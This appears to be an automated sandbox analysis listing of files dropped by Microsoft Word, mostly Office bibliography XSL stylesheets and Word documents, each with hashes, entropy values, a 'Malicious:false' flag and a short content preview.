                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):296658
                                                                                                                                                                                                                                                                Entropy (8bit):5.000002997029767
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                                                                                                                                MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                                                                                                                                SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                                                                                                                                SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                                                                                                                                SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):268317
                                                                                                                                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                                                                                                                                                                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                                                                                                                                                                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                                                                                                                                                                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                                                                                                                                                                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):255948
                                                                                                                                                                                                                                                                Entropy (8bit):5.103631650117028
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                                                                                                                                MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                                                                                                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                                                                                                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                                                                                                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):251032
                                                                                                                                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):284415
                                                                                                                                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                                                                                                                                MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                                                                                                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                                                                                                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                                                                                                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):294178
                                                                                                                                                                                                                                                                Entropy (8bit):4.977758311135714
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                                                                                                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                                                                                                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                                                                                                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                                                                                                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):270198
                                                                                                                                                                                                                                                                Entropy (8bit):5.073814698282113
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                                                                                                                                MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                                                                                                                                SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                                                                                                                                SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                                                                                                                                SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):217137
                                                                                                                                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                                                                                                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                                                                                                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                                                                                                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                                                                                                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):254875
                                                                                                                                                                                                                                                                Entropy (8bit):5.003842588822783
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                                                                                                                                MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                                                                                                                                SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                                                                                                                                SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                                                                                                                                SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):344303
                                                                                                                                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):250983
                                                                                                                                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                                                                                                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                                                                                                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                                                                                                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                                                                                                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):51826
                                                                                                                                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):47296
                                                                                                                                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                                                                                                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                                                                                                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                                                                                                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                                                                                                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):34415
                                                                                                                                                                                                                                                                Entropy (8bit):7.352974342178997
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                                                                                                                                Malicious:false
